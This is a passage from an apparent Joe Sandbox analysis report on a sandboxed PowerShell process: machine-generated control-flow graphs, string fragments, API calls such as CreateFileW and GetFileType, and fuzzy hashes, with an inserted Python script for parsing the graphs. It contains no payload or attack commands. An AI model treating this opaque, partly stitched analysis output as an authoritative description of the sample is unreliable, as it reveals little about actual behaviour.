7ff887a1c099-7ff887a1c0a7 314->328 329 7ff887a1c0aa-7ff887a1c0b5 314->329 317 7ff887a1c041-7ff887a1c067 315->317 318 7ff887a1bfb2-7ff887a1bfbd 315->318 326 7ff887a1c06c-7ff887a1c06f 317->326 331 7ff887a1c071-7ff887a1c081 326->331 332 7ff887a1c082-7ff887a1c086 326->332 328->329 334 7ff887a1c11b-7ff887a1c12d 329->334 335 7ff887a1c0b7-7ff887a1c0fb call 7ff887a12ed8 329->335 331->332 332->314 335->334 338->339 339->302
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4b$b4b$d$hL_H
                                    • API String ID: 0-1639147439
                                    • Opcode ID: 5317a98e6b58dc11bd7ae873a2b93ce60c746cef2d4e4bf35a485b5db6ff8496
                                    • Instruction ID: 3e1bd150d2c2c77fa960364badb1a01a896ff0af7833e98044cc443c203ab205
                                    • Opcode Fuzzy Hash: 5317a98e6b58dc11bd7ae873a2b93ce60c746cef2d4e4bf35a485b5db6ff8496
                                    • Instruction Fuzzy Hash: 46827531A5CA4A8FE359DB2884526B9B7F1FF99354B1441BEC04FC72E3DE28A842C751

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
control_flow_graph 347 7ff887a2cea0-7ff887a2cee1 call 7ff887a1df68 351 7ff887a2cee3-7ff887a2cef3 347->351 352 7ff887a2cef5-7ff887a2cf00 347->352 351->352 353 7ff887a2d243-7ff887a2d246 352->353 354 7ff887a2cf06-7ff887a2cf0a 352->354 355 7ff887a2d248-7ff887a2d25a call 7ff887a1dd38 353->355 356 7ff887a2d25c-7ff887a2d26f 353->356 358 7ff887a2cf1b-7ff887a2cf23 354->358 359 7ff887a2cf0c-7ff887a2cf11 354->359 355->356 360 7ff887a2cf29-7ff887a2cf46 358->360 361 7ff887a2d293-7ff887a2d2a9 358->361 359->358 365 7ff887a2cf4c-7ff887a2cfc0 call 7ff887a1df00 360->365 366 7ff887a2d121-7ff887a2d136 360->366 369 7ff887a2d2ab-7ff887a2d2b2 361->369 370 7ff887a2d2b3-7ff887a2d2bd 361->370 407 7ff887a2cfe8 365->407 408 7ff887a2cfc2-7ff887a2cfc3 365->408 375 7ff887a2d138-7ff887a2d13e 366->375 376 7ff887a2d1b3-7ff887a2d1be 366->376 369->370 373 7ff887a2d2be 370->373 374 7ff887a2d2bf-7ff887a2d2f8 370->374 373->374 390 7ff887a2d2fa-7ff887a2d30f 374->390 391 7ff887a2d312-7ff887a2d350 374->391 381 7ff887a2d152-7ff887a2d161 call 7ff887a1df78 375->381 382 7ff887a2d140-7ff887a2d150 375->382 379 7ff887a2d1cf-7ff887a2d1d6 376->379 380 7ff887a2d1c0-7ff887a2d1c5 376->380 379->361 383 7ff887a2d1dc-7ff887a2d204 379->383 380->379 393 7ff887a2d165-7ff887a2d171 381->393 382->381 397 7ff887a2d270-7ff887a2d292 383->397 398 7ff887a2d205-7ff887a2d21c call 7ff887a1dfe8 383->398 390->391 418 7ff887a2d50a-7ff887a2d532 391->418 419 7ff887a2d356-7ff887a2d379 391->419 393->354 394 7ff887a2d177 393->394 394->353 397->361 405 7ff887a2d21e-7ff887a2d22d call 7ff887a1dfd0 398->405 406 7ff887a2d232-7ff887a2d241 call 7ff887a1df38 398->406 405->406 406->353 411 7ff887a2cfea-7ff887a2d003 407->411 414 7ff887a2cfc7-7ff887a2cfd7 408->414 423 7ff887a2d025-7ff887a2d028 411->423 424 7ff887a2d005-7ff887a2d020 call 7ff887a1df70 411->424 420 7ff887a2cfd9-7ff887a2cfe0 414->420 421 7ff887a2cfe6 414->421 442 7ff887a2d5a6-7ff887a2d5b4 418->442 443 7ff887a2d534-7ff887a2d587 418->443 440 7ff887a2d4e9-7ff887a2d504 419->440 441 7ff887a2d37f-7ff887a2d39d 419->441 420->414 422 7ff887a2cfe2-7ff887a2cfe4 420->422 421->411 422->421 426 7ff887a2d02a-7ff887a2d044 423->426 427 7ff887a2d0a3-7ff887a2d0ab 423->427 424->423 437 7ff887a2d069-7ff887a2d06e 426->437 438 7ff887a2d046-7ff887a2d062 426->438 431 7ff887a2d0b9-7ff887a2d0ca call 7ff887a1df60 427->431 432 7ff887a2d0ad-7ff887a2d0b7 call 7ff887a26e80 427->432 447 7ff887a2d0fa-7ff887a2d10c call 7ff887a1df90 431->447 448 7ff887a2d0cc-7ff887a2d0e6 431->448 432->431 446 7ff887a2d110-7ff887a2d11d 432->446 437->427 455 7ff887a2d070-7ff887a2d082 438->455 456 7ff887a2d064-7ff887a2d067 438->456 440->418 440->419 441->440 466 7ff887a2d3a3-7ff887a2d3ae 441->466 443->442 478 7ff887a2d589-7ff887a2d5a4 443->478 446->393 465 7ff887a2d11f-7ff887a2d199 446->465 447->446 460 7ff887a2d17c-7ff887a2d181 448->460 461 7ff887a2d0ec-7ff887a2d0f8 448->461 462 7ff887a2d084-7ff887a2d09d 455->462 456->462 460->353 461->446 462->397 462->427 465->398 472 7ff887a2d19b-7ff887a2d1a6 call 7ff887a1df58 465->472 473 7ff887a2d3b0-7ff887a2d3ff 466->473 474 7ff887a2d401-7ff887a2d40e 466->474 479 7ff887a2d1ab-7ff887a2d1ae 472->479 473->474 483 7ff887a2d44b-7ff887a2d48e 474->483 484 7ff887a2d410-7ff887a2d449 474->484 478->442 479->353 493 7ff887a2d4e0-7ff887a2d4e8 call 7ff887a2d5b5 483->493 494 7ff887a2d490-7ff887a2d4b8 483->494 484->483 493->440 501 7ff887a2d4ba-7ff887a2d4bf 494->501 502 7ff887a2d4c6-7ff887a2d4de 494->502 501->502 502->493 502->494
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0#l$mK_H$/b
                                    • API String ID: 0-805430417
                                    • Opcode ID: 1f743641673d6ceefee0e05a635a6225005db3b70a05c08601e664b20ecfaef0
                                    • Instruction ID: 1eaa39d50522d98894d6c5253bcd4062f8427f0587509660438c6d1c0e17f34b
                                    • Opcode Fuzzy Hash: 1f743641673d6ceefee0e05a635a6225005db3b70a05c08601e664b20ecfaef0
                                    • Instruction Fuzzy Hash: 81428131A6CA498FEB98EB2C9455AB977F1FF98380F0401B9E44EC7296DE64EC41C741

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: hL_H
                                    • API String ID: 0-3815963757
                                    • Opcode ID: 58b7ee3470862f7e103aadd2f98d8083278322030865682069491e196e3037b5
                                    • Instruction ID: 5fa5f0093f45e8b726b92a39d170c2f3c3e6fd17c39b488f0e93892dfdf1e82c
                                    • Opcode Fuzzy Hash: 58b7ee3470862f7e103aadd2f98d8083278322030865682069491e196e3037b5
                                    • Instruction Fuzzy Hash: 91F10731E5CA8A8FF789DB3884157B977E2FFA9344B1441B9C04EC72E6DE289842C751

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: p[d
                                    • API String ID: 0-894752823
                                    • Opcode ID: 3d52418637921df1031ae5d4f91c0d7cd97605e0da7951224bc8002f0838abd1
                                    • Instruction ID: bda8f262bc1093a2f5928835884e772b01b290c50eea3aacb6b160fa5dcac19c
                                    • Opcode Fuzzy Hash: 3d52418637921df1031ae5d4f91c0d7cd97605e0da7951224bc8002f0838abd1
                                    • Instruction Fuzzy Hash: 5B61D47190CA494FE758DB6C985A6BD7BF1FF59350F04427FD04AD3292DB28A802CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 742 7ff887a1c809-7ff887a1c873 747 7ff887a1c87d-7ff887a1c8dc CreateFileW 742->747 748 7ff887a1c875-7ff887a1c87a 742->748 749 7ff887a1c8de 747->749 750 7ff887a1c8e4-7ff887a1c90c 747->750 748->747 749->750
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: b68b74f7807a3e4775cb498874ce69d068c9463cc2c3e6f758f806c8c38b3982
                                    • Instruction ID: 144d2675499c59094e6ba7562dc606cbde319a6808a7c5ead54d8242cda6f069
                                    • Opcode Fuzzy Hash: b68b74f7807a3e4775cb498874ce69d068c9463cc2c3e6f758f806c8c38b3982
                                    • Instruction Fuzzy Hash: D2319E3191CA5C8FDB58EF5CD846AED7BE0FB69321F14422EE04AD3251CB75A811CB81

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 732 7ff887a145da-7ff887a1c873 737 7ff887a1c87d-7ff887a1c8dc CreateFileW 732->737 738 7ff887a1c875-7ff887a1c87a 732->738 739 7ff887a1c8de 737->739 740 7ff887a1c8e4-7ff887a1c90c 737->740 738->737 739->740
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: bc81e7bd8c0c2e2a63dea470e95ada9b3898aaa1ad4da9dad9f67a33a788e29d
                                    • Instruction ID: bd12e09295a6d2abde54c73029925758bf1687c3e40d5d56d98f189f984b7237
                                    • Opcode Fuzzy Hash: bc81e7bd8c0c2e2a63dea470e95ada9b3898aaa1ad4da9dad9f67a33a788e29d
                                    • Instruction Fuzzy Hash: 4831813191CA1C9FDB58EF58D846AFD77E0FB69311F14422EE04AD3251CB75A8118B85

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 752 7ff887a145ea-7ff887a5f2e2 GetFileType 756 7ff887a5f2ea-7ff887a5f30f 752->756 757 7ff887a5f2e4 752->757 757->756
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID: FileType
                                    • String ID:
                                    • API String ID: 3081899298-0
                                    • Opcode ID: 941e3f658bf5eeeec5a640e73fdd851befc48c14292b6235c50d0f088f4aabb8
                                    • Instruction ID: d89c42106c3fd62b5cd1f2d569a356c45e7e168f01a35e9c6bcf4f6f564c6669
                                    • Opcode Fuzzy Hash: 941e3f658bf5eeeec5a640e73fdd851befc48c14292b6235c50d0f088f4aabb8
                                    • Instruction Fuzzy Hash: F8218E70A08A0C9FDB58DB98C84ABFDB7E1FB59321F10422ED04AD3651DB75A816CB91
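The two API-bearing graphs above (CreateFileW in the function starting at 7ff887a1c809, GetFileType in the one starting at 7ff887a145ea) are only given as the IDA plugin's flat edge list, which is hard to read once a function has more than a handful of blocks. The following Python is an added example and not Joe Sandbox or IDA plugin code: it parses that edge-list text into basic blocks and edges, reports the entry and exit blocks, the imported APIs and direct callees attached to each block, and which blocks lead to each API call. The token grammar it assumes (`<id> <start>[-<end>]`, `call <addr>`, a bare API name, `<src>-><dst>`) is inferred from the lines on this page; the first two sample lines are copied from the report and the third is constructed to exercise the `call` annotation.

```python
"""Parser for the flat 'control_flow_graph' edge lists that the Joe Sandbox
IDA plugin prints in its function cards.  Added example; the grammar below is
inferred from the report text and is an assumption, not a documented format."""
import re
from collections import deque

# Block addresses in this report are 64-bit (12 hex digits), block ids are short
# decimals, so requiring 8+ hex digits tells the two apart (assumption).
_RANGE = re.compile(r"^([0-9a-f]{8,})(?:-([0-9a-f]{8,}))?$")
_EDGE = re.compile(r"^(\d+)->(\d+)$")


class Cfg:
    def __init__(self):
        self.blocks = {}   # block id -> {"start", "end", "calls", "apis"}
        self.edges = []    # (src_id, dst_id)

    def succs(self, bid):
        return [d for s, d in self.edges if s == bid]

    def preds(self, bid):
        return [s for s, d in self.edges if d == bid]

    def entry(self):
        # The function entry is the block no edge points to (listed first).
        cands = [b for b in self.blocks if not self.preds(b)]
        return cands[0] if cands else None

    def exits(self):
        return sorted(b for b in self.blocks if not self.succs(b))

    def api_blocks(self):
        return {b: v["apis"] for b, v in self.blocks.items() if v["apis"]}

    def callees(self):
        return sorted({c for v in self.blocks.values() for c in v["calls"]})

    def ancestors(self, bid):
        """Blocks from which `bid` is reachable (reverse BFS), bid excluded."""
        seen, todo = set(), deque([bid])
        while todo:
            for p in self.preds(todo.popleft()):
                if p not in seen:
                    seen.add(p)
                    todo.append(p)
        seen.discard(bid)
        return seen


def parse_cfg(text):
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    g, cur, i = Cfg(), None, 0
    while i < len(toks):
        t = toks[i]
        m = _EDGE.match(t)
        if m:                                   # "<src>-><dst>"
            g.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif t == "call" and cur is not None and i + 1 < len(toks):
            g.blocks[cur]["calls"].append(toks[i + 1])   # direct call target
            i += 2
        elif t.isdigit() and i + 1 < len(toks) and _RANGE.match(toks[i + 1]):
            m = _RANGE.match(toks[i + 1])       # "<id> <start>[-<end>]"
            cur = int(t)
            g.blocks[cur] = {"start": int(m.group(1), 16),
                             "end": int(m.group(2) or m.group(1), 16),
                             "calls": [], "apis": []}
            i += 2
        elif cur is not None:                   # bare token: imported API name
            g.blocks[cur]["apis"].append(t)
            i += 1
        else:
            raise ValueError(f"unexpected token {t!r} before first block")
    return g


# Sample input.  The first two lines are the CreateFileW and GetFileType graphs
# as printed in this report; the third is constructed to show a direct call.
CREATEFILE_CFG = ("control_flow_graph 742 7ff887a1c809-7ff887a1c873 "
                  "747 7ff887a1c87d-7ff887a1c8dc CreateFileW 742->747 "
                  "748 7ff887a1c875-7ff887a1c87a 742->748 749 7ff887a1c8de "
                  "747->749 750 7ff887a1c8e4-7ff887a1c90c 747->750 "
                  "748->747 749->750")
GETFILETYPE_CFG = ("control_flow_graph 752 7ff887a145ea-7ff887a5f2e2 GetFileType "
                   "756 7ff887a5f2ea-7ff887a5f30f 752->756 757 7ff887a5f2e4 "
                   "752->757 757->756")
CALL_CFG = ("control_flow_graph 1 7ff800000000-7ff800000010 call 7ff800000100 "
            "2 7ff800000012 1->2")   # constructed, addresses are made up


def summarize(text):
    g = parse_cfg(text)
    return {"blocks": len(g.blocks), "edges": len(g.edges),
            "entry": g.entry(), "exits": g.exits(),
            "apis": g.api_blocks(), "callees": g.callees(),
            "blocks_leading_to_api": {b: sorted(g.ancestors(b))
                                      for b in g.api_blocks()}}


if __name__ == "__main__":
    for name, cfg in (("CreateFileW", CREATEFILE_CFG),
                      ("GetFileType", GETFILETYPE_CFG)):
        print(name, summarize(cfg))
```

For the CreateFileW graph this reports entry block 742, a single exit block 750, and that block 747 (the one calling CreateFileW) is reached from 742 directly and via the short block 748; for GetFileType the API sits in the entry block itself, so nothing precedes it. Feeding it one of the longer edge lists on this page is the same call with that text as input.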
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1467405757.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887ae0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d816a01862ef5273282b09f78b6fd31efb6f73d5b5bddaa154a460c71cba8416
                                    • Instruction ID: 389a993cac124a066dc071fe02b762355cf3f5264069914659e11d274ba3f7c8
                                    • Opcode Fuzzy Hash: d816a01862ef5273282b09f78b6fd31efb6f73d5b5bddaa154a460c71cba8416
                                    • Instruction Fuzzy Hash: 6422246294EBCA5FE356873858A617E7FF0FF52260B2901FBC09DC7193DA185806C792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +$EI_H$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$m
                                    • API String ID: 0-3261580099
                                    • Opcode ID: df1fb2eb07000575ed0060b286eedd2675a9742d9425b5196692c3eb3b51a1e6
                                    • Instruction ID: 55ed371e4bda8ae19a139407dd4d938533eba8138197eea40be562a8eadb966f
                                    • Opcode Fuzzy Hash: df1fb2eb07000575ed0060b286eedd2675a9742d9425b5196692c3eb3b51a1e6
                                    • Instruction Fuzzy Hash: AE629B71E58A4A8FE799DF58D4557A9B7F1FB98340F1002FDE04DD3292CE396A818B02
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: }d$ }d$ }d$0#l$0#l$0Xl$0Xl$Xkh$Xkh$x!l$x!l
                                    • API String ID: 0-3015425886
                                    • Opcode ID: 1f9c47be262496f53687fbe6947a62a8dd4868110b45cf93a0023d23380dfdc6
                                    • Instruction ID: 5f2f36346560b37037392a552e7341f9ee460e7c66bcd93eb8509ddd050dda3a
                                    • Opcode Fuzzy Hash: 1f9c47be262496f53687fbe6947a62a8dd4868110b45cf93a0023d23380dfdc6
                                    • Instruction Fuzzy Hash: 58A2E831A9C9468FEB98DB2C845AA7877F2FF64340B5501BDD00ED72A2DE26EC52C741
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: K_I$sJ_^
                                    • API String ID: 0-2135094936
                                    • Opcode ID: 647b1db920a6ad94d1bf99a22fa7318189ce4d0e352c814360eb7257f68ec029
                                    • Instruction ID: 561eaaa91ac0904f2e3ee9078fff17d12704928edda018967083cd8e245ac645
                                    • Opcode Fuzzy Hash: 647b1db920a6ad94d1bf99a22fa7318189ce4d0e352c814360eb7257f68ec029
                                    • Instruction Fuzzy Hash: CD32E831A9CA464BE75CEB2C94566BA73E1FF94380F5445BED04EC72C3DE29A842C781
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: gJ_H
                                    • API String ID: 0-3214708873
                                    • Opcode ID: ff1803591ff55c5dc5382dabb6dab249f9804e468ba86fdacfab85aa2a64a8c4
                                    • Instruction ID: 4970914160cb35e3e6534520a3169d26da82c3618af0664fcaef08326a11201f
                                    • Opcode Fuzzy Hash: ff1803591ff55c5dc5382dabb6dab249f9804e468ba86fdacfab85aa2a64a8c4
                                    • Instruction Fuzzy Hash: AD126170A5CB468FE7A8DF1894467BAB3E1FB98751F10467ED08DC3291DE35A842C782
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1467405757.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887ae0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50b27a01b8d392797064ee7cc35a6dc4de5925ea4d4139e221c1972a862decc5
                                    • Instruction ID: a830de31f2120d89332f34e8d3dc8b893f65edfe919bd66ac7c463c654b75e40
                                    • Opcode Fuzzy Hash: 50b27a01b8d392797064ee7cc35a6dc4de5925ea4d4139e221c1972a862decc5
                                    • Instruction Fuzzy Hash: 8A418213E8DBD64FE3A6873858961AD6FF1FF52690B2900FAC099CB1D3D90C5856C352